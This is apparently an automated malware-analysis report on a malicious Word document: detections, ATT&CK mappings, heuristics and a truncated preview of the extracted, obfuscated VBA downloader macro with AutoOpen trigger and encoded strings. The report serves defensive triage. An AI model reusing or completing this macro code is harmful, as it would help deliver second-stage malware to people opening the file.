Verdict: MALICIOUS
Risk Score: 224
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject to execute code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of the extracted VBA macro file 'macros.bas' strongly indicate that this file is a downloader for a second-stage payload. Obfuscated script functions such as 'kzIIu' suggest an attempt to hide the download URL or the execution mechanism.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41004 bytes |

SHA-256: d89a44f83bf87fffc21ec1136071e4aed841e37241d158dc34577767d85939f4

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 16 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "cRDqVGKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZjoOvursHAOjf"
Function cjQJFbvwvVuHEr()
On Error Resume Next
For Each CPCiw In slVmDE
Gudzj = 32808 - jNlrJ
For Each KMWAB In SCTiR
ijvdAo = FtLwri
Next
Next
nFdXHdj = kzIIu("IiEAOAA3AGMAMQA0ADEAMwA5AGIAZQA2AGQAOAA3ADQAMwA3ADcAYwBlADEATbJWjaX", 3, 58)
For Each joUod In ZvkjP
kimWm = 23487 - IChJD
For Each wQEKz In iVnqd
fEFQjz = NfDwS
Next
Next
For Each vwUSvN In lLbFL
aUjTP = 79806 - ijLBG
For Each qdmIA In MsdiY
nNpCP = rzfLh
Next
Next
tDiTJ = kzIIu("iKI.QBiAGQANwBkAQWoT", 5, 12)
For Each jtisBM In SMfWZw
avwLz = 72603 - RcbWj
For Each DKIkf In BbHbUq
zFpIq = DNhvz
Next
Next
For Each zHXHpF In UVUIno
jtGZs = 97114 - cnGDsk
For Each KkXka In wZkNzr
vXQBFE = qiPpk
Next
Next
KzhihczwzqG = kzIIu("K2ADIAZQA4ADMAZAA4AGUAYgAxAGQANQBkAGQAMABjAGIAMQA0ADgAMgAyADgAMwA2AGIANfQw1Q", 2, 70)
For Each wXTQD In VNJlzY
wVJJt = 53107 - OnFXF
For Each oaibUh In YtaFU
AWWll = dsFoj
Next
Next
For Each jAzzwB In AisZR
jJqcL = 32160 - CRVOYD
For Each zBiJh In HCFvK
qJArOE = GQwMs
Next
Next
HUifUk = kzIIu("4m.B%W4AGIAOQBlADMAOAA3ADEAMAA3ANhQ", 7, 26)
For Each iDdSf In ZvvawD
rMEdDu = 35129 - aSBZG
For Each Kwpwp In jDCdja
kDujC = fMBCmu
Next
Next
For Each DbBLD In bFQvYR
KnrSP = 52103 - ZjEGP
For Each kjIOA In wCppfh
hZWqC = omskt
Next
Next
jTLVQJHDEL = kzIIu("aAGYANgBlADcANgBmAGUAZQAyADEAMwAxAGYAOQA4ADMAYgAyAGUAZgAxADYAOAAwAGUAMQA3ADMAYwAyADQAMwA0ADUANQBlAGIAOQA4ADcAOQAyADUANAA3AGMAZgAxAwKa7r", 2, 129)
For Each PMdzUX In vCGszC
nTPVzL = 69993 - tpCsB
For Each bOrzO In kYUCV
klzbh = oGRUW
Next
Next
For Each RHGil In BFTmrz
lhwFaP = 84949 - BlVWh
For Each NSHnE In uECRY
YnuMh = abcPzb
Next
Next
OIKnStzmf = kzIIu("@IK.BhAGMAOAA5ADYAMQA4ADgAZABjADEANAA2ADgANQA3ADkANgBlAGIAOABmADMAOAA1GUDz", 5, 66)
For Each skDPWk In DdnnL
mjmjfi = 63057 - qEKpD
For Each wFbwUj In Miqoj
MRvAHA = ttpvjT
Next
Next
For Each MUcbHX In djLCEZ
dRjkm = 44035 - YbsEwu
For Each AGCQFj In QUaFJv
kiwLXt = SinjiI
Next
Next
voRtjZbj = kzIIu("maAiAMAAyAGlNP", 5, 7)
For Each skWJdz In ZImwpa
zJfdb = 77325 - stsbAc
For Each cPjaap In kDvjv
KaMMh = lVVID
Next
Next
For Each VsHzPk In sbAtD
iYzIQp = 72002 - YJslWw
For Each lKlfpi In OQzIz
FNtmhA = zCAib
Next
Next
dYjwY = kzIIu("bGIAMABkADIAZAAwAGMAMQBkAGMAZQA3ADEAMQBhADUU8YPdAY", 2, 42)
For Each GziPOt In mGQONN
fJjII = 84770 - ULQFD
For Each tmjKG In HcFfB
PJzzwi = TsWpT
Next
Next
For Each QqwCT In tYPQW
ZlizG = 38964 - awfNAu
For Each wWBwbi In quvWa
XWwRND = zQboRT
Next
Next
SlZlitzAJ = kzIIu("vUlYIANwAxADUAZQA3ADQAMAA5ADIANAAzADEAOQA3ADUAZgAxAGYAOABlADgAMgBjADYAYwA0ADQAMQA2ADEAMA2i", 5, 84)
For Each OJlcwH In JXWRon
iqjcjm = 52232 - wOzwO
For Each juNjHC In hJSZS
OzbAZ = oOZsM
Next
Next
For Each mfucdo In bjDzj
VSOaq = 46940 - Epjdk
For Each GYPwJ In nqSizw
jvQalL = SwiGA
Next
Next
qSiaq = kzIIu("i43YAYwBlADcAYgA2ADQANwBkADcAZABmC7X55", 5, 29)
For Each Qjjww In rYihL
uWsLCk = 33518 - JpdnPv
For Each NmHqI In qLGGWj
HIBNFq = piHvzp
Next
Next
For Each DrdNu In XQwqdz
OTYzRw = 63947 - JhPNXQ
For Each REJHXd In MiZsf
ibFdQD = wzdRv
Next
Next
ivGBZE = kzIIu("WUDwA3AHYAUgBjAFoAagBZA
```

... (truncated)